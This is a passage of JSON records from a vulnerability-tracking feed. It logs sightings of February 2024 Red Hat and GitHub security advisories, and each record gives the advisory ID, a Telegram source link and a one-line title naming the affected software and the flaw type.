"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0717", "type": "seen", "source": "https://t.me/ctinow/180738", "content": "https://ift.tt/82qd36S\nRHSA-2024:0717: Important: runc security update", "creation_timestamp": "2024-02-07T15:17:04.000000Z"}, {"uuid": "2e7b207b-f040-4232-ab64-99779c865c1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24RP-Q3W6-VC56", "type": "seen", "source": "https://t.me/ctinow/190682", "content": "https://ift.tt/IvxEKs0\nCVE-2024-1597 | PostgreSQL pgjdbc up to 42.7.1 Simple Query Mode sql injection (GHSA-24rp-q3w6-vc56)", "creation_timestamp": "2024-02-22T12:46:47.000000Z"}, {"uuid": "ee18ca34-2187-4bc1-8bae-750138b826ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GJ48-W74W-8GVM", "type": "seen", "source": "https://t.me/ctinow/190657", "content": "https://ift.tt/0c7mynH\n[GHSA-gj48-w74w-8gvm] Path Traversal in TYPO3 Core", "creation_timestamp": "2024-02-22T12:06:50.000000Z"}, {"uuid": "6e900b2c-6baf-477a-ac04-8b7b73fac2f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ3G-8Q6P-63PC", "type": "seen", "source": "https://t.me/ctinow/190643", "content": "https://ift.tt/b02ErCg\nCVE-2024-23834 | Discourse up to 3.1.4/3.2.0.beta4 cross site scripting (GHSA-rj3g-8q6p-63pc)", "creation_timestamp": "2024-02-22T11:37:05.000000Z"}, {"uuid": "d1dad0e0-a8e6-4053-8599-c284435167f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8WXQ-346H-XMR8", "type": "seen", "source": "https://t.me/ctinow/190529", "content": "https://ift.tt/5TdznYc\nCVE-2024-22200 | vantage6-UI up to 4.1.x Nginx information disclosure (GHSA-8wxq-346h-xmr8)", "creation_timestamp": "2024-02-22T08:37:19.000000Z"}, {"uuid": "c52ae3e2-8fa9-4d3e-85b0-6c6ef68d9803", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WGC-48G2-CJ5W", "type": "seen", "source": "https://t.me/ctinow/190528", "content": "https://ift.tt/NPJga7i\nCVE-2024-21653 | vantage6 up to 4.1.x SSH Service access control (GHSA-2wgc-48g2-cj5w)", "creation_timestamp": "2024-02-22T08:37:17.000000Z"}, {"uuid": "0d0cdd13-7403-4c3d-aab2-625f205fdb14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M3F4-957X-M785", "type": "seen", "source": "https://t.me/ctinow/183501", "content": "https://ift.tt/ClzGvy8\n[GHSA-m3f4-957x-m785] lambda-middleware Inefficient Regular Expression Complexity vulnerability", "creation_timestamp": "2024-02-12T23:46:26.000000Z"}, {"uuid": "4266bbe5-8eab-4afd-906f-c52f18ae098a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PWR2-4V36-6QPR", "type": "seen", "source": "https://t.me/ctinow/193813", "content": "https://ift.tt/doL1UNT\n[GHSA-pwr2-4v36-6qpr] orjson does not limit recursion for deeply nested JSON documents", "creation_timestamp": "2024-02-26T22:46:38.000000Z"}, {"uuid": "2bbff8f0-3ce6-47a5-b0b6-bcac837ebc58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HWQ-4CPM-8VMX", "type": "seen", "source": "https://t.me/ctinow/193774", "content": "https://ift.tt/6qOPZn3\n[GHSA-4hwq-4cpm-8vmx] Vyper's `extract32` can ready dirty memory", "creation_timestamp": "2024-02-26T21:26:25.000000Z"}, {"uuid": "9775f260-0cbb-4c7f-adc8-ef39fc13511b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RGGV-CV7R-MW98", "type": "seen", "source": "https://t.me/ctinow/193773", "content": "https://ift.tt/TEl2kZw\n[GHSA-rggv-cv7r-mw98] Connection leaking on idle timeout when TCP congested", "creation_timestamp": "2024-02-26T21:26:24.000000Z"}, {"uuid": "aed49a73-cb0e-43e8-bb1d-918b509fdbc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84C3-J8R2-MCM8", "type": "seen", "source": "https://t.me/ctinow/193772", "content": "https://ift.tt/SBFpCRb\n[GHSA-84c3-j8r2-mcm8] @nfid/embed has compromised private key due to @dfinity/auth-client producing insecure session keys", "creation_timestamp": "2024-02-26T21:26:23.000000Z"}, {"uuid": "8296d093-12c5-45b6-89c1-0d8a21d18a53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63H4-W25C-3QV4", "type": "seen", "source": "https://t.me/ctinow/193764", "content": "https://ift.tt/y4AfZmx\n[GHSA-63h4-w25c-3qv4] Kirby vulnerable to Cross-site scripting (XSS) in the link field \"Custom\" type", "creation_timestamp": "2024-02-26T21:17:24.000000Z"}, {"uuid": "13a8d3b5-b22f-4c07-937e-6feceae7c24c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0174", "type": "seen", "source": "https://t.me/ctinow/193652", "content": "https://ift.tt/u9BqFD3\nCVE-2019-14815 | Linux Kernel WMM heap-based overflow (RHSA-2020:0174)", "creation_timestamp": "2024-02-26T19:21:18.000000Z"}, {"uuid": "9a100754-31b0-48f2-b642-b266239ed13c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0481", "type": "seen", "source": "https://t.me/ctinow/193636", "content": "https://ift.tt/QzMt8j3\nCVE-2019-10174 | Infinispan up to 9.x invokeAccessibly Application unknown vulnerability (RHSA-2020:0481)", "creation_timestamp": "2024-02-26T18:46:56.000000Z"}, {"uuid": "dabaace0-382a-400e-8e75-73c9f83aabb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0977", "type": "seen", "source": "https://t.me/ctinow/193220", "content": "https://ift.tt/2suLCKQ\nRHSA-2024:0977: Important: unbound security update", "creation_timestamp": "2024-02-26T10:16:39.000000Z"}, {"uuid": "07cf16c1-6d98-453d-9af9-4d7118d0328b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R64R-5H43-26QV", "type": "seen", "source": "https://t.me/ctinow/187208", "content": "https://ift.tt/O8e5BYC\nCVE-2024-23649 | Lemmy up to 0.19.0 API report improper authorization (GHSA-r64r-5h43-26qv)", "creation_timestamp": "2024-02-18T10:48:47.000000Z"}, {"uuid": "36b57caa-6af8-4b1e-94ed-41cbdfd6ad25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0980", "type": "seen", "source": "https://t.me/ctinow/193251", "content": "https://ift.tt/taCh0FI\nRHSA-2024:0980: Important: kernel security update", "creation_timestamp": "2024-02-26T11:16:27.000000Z"}, {"uuid": "fb11e7c5-2cbe-4704-b70f-eb6a73e921ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0981", "type": "seen", "source": "https://t.me/ctinow/193250", "content": "https://ift.tt/oGpqxik\nRHSA-2024:0981: Important: unbound security update", "creation_timestamp": "2024-02-26T11:16:26.000000Z"}, {"uuid": "58fbd2fc-e331-4ff5-aa03-a7487692cb50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0962", "type": "seen", "source": "https://t.me/ctinow/193075", "content": "https://ift.tt/dVCDGY6\nRHSA-2024:0962: Important: thunderbird security update", "creation_timestamp": "2024-02-26T04:16:40.000000Z"}, {"uuid": "5a06a7b8-2c24-44a1-9097-fb64eda40253", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0973", "type": "seen", "source": "https://t.me/ctinow/193074", "content": "https://ift.tt/YjF0b1A\nRHSA-2024:0973: Important: postgresql:15 security update", "creation_timestamp": "2024-02-26T04:16:39.000000Z"}, {"uuid": "40046260-2c41-4e1b-8015-4e863b2d53b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0974", "type": "seen", "source": "https://t.me/ctinow/193073", "content": "https://ift.tt/jClvAHc\nRHSA-2024:0974: Important: postgresql:12 security update", "creation_timestamp": "2024-02-26T04:16:38.000000Z"}, {"uuid": "550b156c-a752-47be-bf1c-996e41189166", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0963", "type": "seen", "source": "https://t.me/ctinow/193058", "content": "https://ift.tt/6dHB1oj\nRHSA-2024:0963: Important: thunderbird security update", "creation_timestamp": "2024-02-26T03:16:52.000000Z"}, {"uuid": "55b55eba-cf2e-40af-9843-f1299c66e27d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0955", "type": "seen", "source": "https://t.me/ctinow/193053", "content": "https://ift.tt/yI04CqA\nRHSA-2024:0955: Important: firefox security update", "creation_timestamp": "2024-02-26T02:16:57.000000Z"}, {"uuid": "93064ce7-45e7-4099-8389-508c7a5e1eff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0956", "type": "seen", "source": "https://t.me/ctinow/193052", "content": "https://ift.tt/mDZgevd\nRHSA-2024:0956: Important: postgresql:10 security update", "creation_timestamp": "2024-02-26T02:16:53.000000Z"}, {"uuid": "81c4ce9c-c01f-4723-bf83-8ff273338148", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0988", "type": "seen", "source": "https://t.me/ctinow/193466", "content": "https://ift.tt/Q0AZqdn\nRHSA-2024:0988: Important: rh-postgresql13-postgresql security update", "creation_timestamp": "2024-02-26T16:16:59.000000Z"}, {"uuid": "d8a8ef92-862e-4dd7-973a-49979473cfe4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0957", "type": "seen", "source": "https://t.me/ctinow/193051", "content": "https://ift.tt/WNVm0Yy\nRHSA-2024:0957: Important: thunderbird security update", "creation_timestamp": "2024-02-26T02:16:52.000000Z"}, {"uuid": "53acd3ff-9331-4a74-b4ca-280d1397102c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0958", "type": "seen", "source": "https://t.me/ctinow/193050", "content": "https://ift.tt/JMnrqdD\nRHSA-2024:0958: Important: thunderbird security update", "creation_timestamp": "2024-02-26T02:16:51.000000Z"}, {"uuid": "cd3a0140-5c32-4b4c-a429-e4077f082533", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0960", "type": "seen", "source": "https://t.me/ctinow/193049", "content": "https://ift.tt/4AVvfSX\nRHSA-2024:0960: Important: thunderbird security update", "creation_timestamp": "2024-02-26T02:16:50.000000Z"}, {"uuid": "29203946-f0e8-4e1a-9f9b-f6893f1a6c49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0989", "type": "seen", "source": "https://t.me/ctinow/193515", "content": "https://ift.tt/EeXtB1u\nRHSA-2024:0989: Critical: Red Hat Multicluster GlobalHub 1.0.2 bug fixes and security updates", "creation_timestamp": "2024-02-26T17:16:28.000000Z"}, {"uuid": "f737a0c9-7a3e-430e-8e09-9e46398e9925", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0983", "type": "seen", "source": "https://t.me/ctinow/193248", "content": "https://ift.tt/IBAW0dw\nRHSA-2024:0983: Important: firefox security update", "creation_timestamp": "2024-02-26T11:16:24.000000Z"}, {"uuid": "8d1e5f5a-abc4-4534-b89a-20b13b94b3cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0984", "type": "seen", "source": "https://t.me/ctinow/193247", "content": "https://ift.tt/OhIFu8N\nRHSA-2024:0984: Important: thunderbird security update", "creation_timestamp": "2024-02-26T11:16:23.000000Z"}, {"uuid": "f0b252a0-92c9-4309-bb63-d898e36e5453", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0975", "type": "seen", "source": "https://t.me/ctinow/193085", "content": "https://ift.tt/0uypJGb\nRHSA-2024:0975: Important: postgresql:13 security update", "creation_timestamp": "2024-02-26T05:16:39.000000Z"}, {"uuid": "b8df36a0-c6b9-4770-991a-2278c4932d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0978", "type": "seen", "source": "https://t.me/ctinow/193253", "content": "https://ift.tt/8jQbAne\nRHSA-2024:0978: Moderate: linux-firmware security update", "creation_timestamp": "2024-02-26T11:16:30.000000Z"}, {"uuid": "d3bdf2fb-bdba-42be-9c4b-efb02e93ab6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0979", "type": "seen", "source": "https://t.me/ctinow/193252", "content": "https://ift.tt/kH4rmY3\nRHSA-2024:0979: Moderate: linux-firmware security update", "creation_timestamp": "2024-02-26T11:16:29.000000Z"}, {"uuid": "0fbebc6d-6cb9-4b93-aad9-9689142f484e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0961", "type": "seen", "source": "https://t.me/ctinow/193048", "content": "https://ift.tt/YZ3KAxB\nRHSA-2024:0961: Important: thunderbird security update", "creation_timestamp": "2024-02-26T02:16:49.000000Z"}, {"uuid": "8dfd8efc-00dd-49aa-bb17-9fa688b2706a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q68H-XWQ5-MM7X", "type": "seen", "source": "https://t.me/ctinow/186970", "content": "https://ift.tt/5CcjGiJ\nCVE-2023-47115 | HumanSignal label-studio up to 1.9.1 users/functions.py cross site scripting (GHSA-q68h-xwq5-mm7x)", "creation_timestamp": "2024-02-17T16:46:50.000000Z"}, {"uuid": "ea35f192-ba05-44bc-a4fb-f03fb4c8bc4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MRQ-W8PV-5PVQ", "type": "seen", "source": "https://t.me/ctinow/192847", "content": "https://ift.tt/0RehdkB\nCVE-2024-23635 | nahsra AntiSamy up to 1.7.4 cross site scripting (GHSA-2mrq-w8pv-5pvq)", "creation_timestamp": "2024-02-25T11:47:00.000000Z"}, {"uuid": "776a8388-ef8f-4e8d-994a-f30e7948acf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GP3W-2V2M-P686", "type": "seen", "source": "https://t.me/ctinow/192825", "content": "https://ift.tt/N6KBJbj\nCVE-2024-24560 | vyperlang Vyper up to 0.3.10 memory corruption (GHSA-gp3w-2v2m-p686)", "creation_timestamp": "2024-02-25T10:41:40.000000Z"}, {"uuid": "89a75ef2-993e-4990-9250-c2f7e139a7e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GMPJ-5XCM-XXX6", "type": "seen", "source": "https://t.me/ctinow/192814", "content": "https://ift.tt/gUwa34k\nCVE-2024-24760 | mailcow prior 2024-01c external reference (GHSA-gmpj-5xcm-xxx6)", "creation_timestamp": "2024-02-25T10:11:14.000000Z"}, {"uuid": "6ae2d254-ea5c-4de6-85f8-923862dd1b72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2FC9-XPP8-2G9H", "type": "seen", "source": "https://t.me/ctinow/192065", "content": "https://ift.tt/ieLUIHG\n[GHSA-2fc9-xpp8-2g9h] `@backstage/backend-common` vulnerable to path traversal through symlinks", "creation_timestamp": "2024-02-23T19:16:50.000000Z"}, {"uuid": "f1de8666-7092-49d3-8f13-1e91c084d60b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45RV-3C5P-W4H7", "type": "seen", "source": "https://t.me/ctinow/192815", "content": "https://ift.tt/NfpzgwV\nCVE-2024-23824 | mailcow prior 2024-01 resource consumption (GHSA-45rv-3c5p-w4h7)", "creation_timestamp": "2024-02-25T10:11:16.000000Z"}, {"uuid": "38778ec9-73a8-48b3-b590-992527d06a8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R38C-CP8W-664M", "type": "seen", "source": "https://t.me/ctinow/192642", "content": "https://ift.tt/FnU2qTK\nCVE-2024-24755 | discourse-group-membership-ip-block information disclosure (GHSA-r38c-cp8w-664m)", "creation_timestamp": "2024-02-24T16:11:32.000000Z"}, {"uuid": "82a44902-35da-43c0-ba0a-85cf3481efce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7R69-3VWH-WCFR", "type": "seen", "source": "https://t.me/ctinow/192811", "content": "https://ift.tt/z6Gbyns\nCVE-2024-24757 | Degamisu open-irs up to 1.0.0 ENV File information disclosure (GHSA-7r69-3vwh-wcfr)", "creation_timestamp": "2024-02-25T10:11:11.000000Z"}, {"uuid": "1113f756-0b76-4c73-876a-b91aa2720220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VGWR-4W3P-XMJV", "type": "seen", "source": "https://t.me/ctinow/192605", "content": "https://ift.tt/VLNfEpk\nCVE-2024-24482 | Aprktool up to 2.9.2 on Windows path traversal (GHSA-vgwr-4w3p-xmjv)", "creation_timestamp": "2024-02-24T14:47:04.000000Z"}, {"uuid": "1e6857bb-5625-41d0-bf38-382354198cce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QH4G-4M4W-JGV2", "type": "seen", "source": "https://t.me/ctinow/192537", "content": "https://ift.tt/41YjFEe\nCVE-2024-24569 | pixee java-security-toolkit up to 1.1.1 path traversal (GHSA-qh4g-4m4w-jgv2)", "creation_timestamp": "2024-02-24T11:16:53.000000Z"}, {"uuid": "c4a205b2-06a1-4a25-b4af-bfc3f48c4f00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QM2J-QVQ3-J29V", "type": "seen", "source": "https://t.me/ctinow/186809", "content": "https://ift.tt/5zSYOHX\nCVE-2023-48714 | SilverStripe Framework up to 4.13.38/5.1.10 GridFieldAddExistingAutocompleter information disclosure (GHSA-qm2j-qvq3-j29v)", "creation_timestamp": "2024-02-17T08:06:40.000000Z"}, {"uuid": "5d8342c7-3b31-4dc4-b50e-ec51c4cc4179", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JGPH-W8RH-XF5P", "type": "seen", "source": "https://t.me/ctinow/186806", "content": "https://ift.tt/3FiS4WB\nCVE-2023-44401 | SilverStripe graphql up to 4.3.6/5.1.2 authorization (GHSA-jgph-w8rh-xf5p)", "creation_timestamp": "2024-02-17T08:06:37.000000Z"}, {"uuid": "3948a4de-70da-4c12-a939-d510e619063f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8H4X-XVJP-VF99", "type": "seen", "source": "https://t.me/ctinow/186706", "content": "https://ift.tt/CM5psNS\n[GHSA-8h4x-xvjp-vf99] Hazelcast Platform permission checking in CSV File Source connector", "creation_timestamp": "2024-02-17T00:26:44.000000Z"}, {"uuid": "4291e966-02a5-4dc3-9a4d-02d7ab39c6c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V4XV-795H-RV4H", "type": "seen", "source": "https://t.me/ctinow/186589", "content": "https://ift.tt/hlPrA6W\nCVE-2024-23345 | Nautobot up to 1.6.9/2.1.1 cross site scripting (GHSA-v4xv-795h-rv4h)", "creation_timestamp": "2024-02-16T19:26:26.000000Z"}, {"uuid": "8cf9029d-a622-4e3b-a665-c3fcee560d78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0641", "type": "seen", "source": "https://t.me/ctinow/180869", "content": "https://ift.tt/cYAOaeK\nRHSA-2024:0641: Critical: OpenShift Container Platform 4.14.11 security and extras update", "creation_timestamp": "2024-02-07T18:17:19.000000Z"}, {"uuid": "148893bf-74c9-4a84-b7e9-ce4048463ffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0724", "type": "seen", "source": "https://t.me/ctinow/180868", "content": "https://ift.tt/hsWMgUw\nRHSA-2024:0724: Important: kernel security and bug fix update", "creation_timestamp": "2024-02-07T18:17:18.000000Z"}, {"uuid": "77706cc5-9e4d-4f05-94f8-7705811ac809", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0725", "type": "seen", "source": "https://t.me/ctinow/180867", "content": "https://ift.tt/aQ3oVym\nRHSA-2024:0725: Important: kernel-rt security update", "creation_timestamp": "2024-02-07T18:17:16.000000Z"}, {"uuid": "7b657f8a-f434-4fb8-9f2d-31d22461586b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9XFW-JJQ2-7V8H", "type": "seen", "source": "https://t.me/ctinow/179513", "content": "https://ift.tt/rZJk9z8\n[GHSA-9xfw-jjq2-7v8h] 1Panel set-cookie is missing the Secure keyword", "creation_timestamp": "2024-02-05T21:26:51.000000Z"}, {"uuid": "189eacd7-2534-47a9-863b-abdb2209f951", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93GM-QMQ6-W238", "type": "seen", "source": "https://t.me/ctinow/179403", "content": "https://ift.tt/i7gdvLy\n[GHSA-93gm-qmq6-w238] Starlette Content-Type Header ReDoS", "creation_timestamp": "2024-02-05T18:16:43.000000Z"}, {"uuid": "58736335-7a9c-4c9d-b2bd-00dbaa9367c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJHP-44RV-7V59", "type": "published-proof-of-concept", "source": "https://t.me/ctinow/185954", "content": "https://ift.tt/bNDxKRQ\nCVE-2024-22211 | FreeRDP up to 2.11.4/3.1.x planar.c freerdp_bitmap_planar_context_reset heap-based overflow (GHSA-rjhp-44rv-7v59)", "creation_timestamp": "2024-02-15T23:02:26.000000Z"}, {"uuid": "2d8ca592-a26c-4fd2-a91a-8c0c20175c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57WX-M636-G3G8", "type": "seen", "source": "https://t.me/ctinow/185822", "content": "https://ift.tt/vSJolk4\nCVE-2024-23332 | Notary Project Notation up to 1.0.1 operation after expiration (GHSA-57wx-m636-g3g8)", "creation_timestamp": "2024-02-15T19:26:56.000000Z"}, {"uuid": "1745f6fd-d846-4e1f-986a-c9907b32762a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0850", "type": "seen", "source": "https://t.me/ctinow/185788", "content": "https://ift.tt/qzG0u4D\nRHSA-2024:0850: Important: kpatch-patch security update", "creation_timestamp": "2024-02-15T19:16:58.000000Z"}, {"uuid": "1cf98e1b-bfd4-499f-ab38-372fd8da8d57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0851", "type": "seen", "source": "https://t.me/ctinow/185787", "content": "https://ift.tt/vL3nz5D\nRHSA-2024:0851: Important: kpatch-patch security update", "creation_timestamp": "2024-02-15T19:16:56.000000Z"}, {"uuid": "e0843f48-d46a-4abb-9f64-9b4c44bd5831", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3HJ-WR2Q-X83G", "type": "seen", "source": "https://t.me/ctinow/185773", "content": "https://ift.tt/AylvtHn\nCVE-2024-23688 | Consensys Discovery up to 0.4.4 AES Handler/GCM nonce re-use (GHSA-w3hj-wr2q-x83g)", "creation_timestamp": "2024-02-15T18:57:04.000000Z"}, {"uuid": "13fdacc8-4b16-44ce-b805-6c66ac96f4a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FJ2W-WFGV-MWQ6", "type": "seen", "source": "https://t.me/ctinow/185772", "content": "https://ift.tt/lUxwbnk\nCVE-2024-23684 | com.upokecenter.cbor up to 4.5.1 DecodeFromBytes algorithmic complexity (GHSA-fj2w-wfgv-mwq6)", "creation_timestamp": "2024-02-15T18:57:03.000000Z"}, {"uuid": "8b8ee162-a1b7-4da2-82b5-325f5dfd0609", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H8WQ-GHFQ-5HFX", "type": "seen", "source": "https://t.me/ctinow/186209", "content": "https://ift.tt/kYSKX7f\nCVE-2023-44395 | Autolab up to 2.11.x Assessment path traversal (GHSA-h8wq-ghfq-5hfx)", "creation_timestamp": "2024-02-16T09:41:26.000000Z"}, {"uuid": "673f85a0-c397-4406-b2c2-5d2facf7be5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 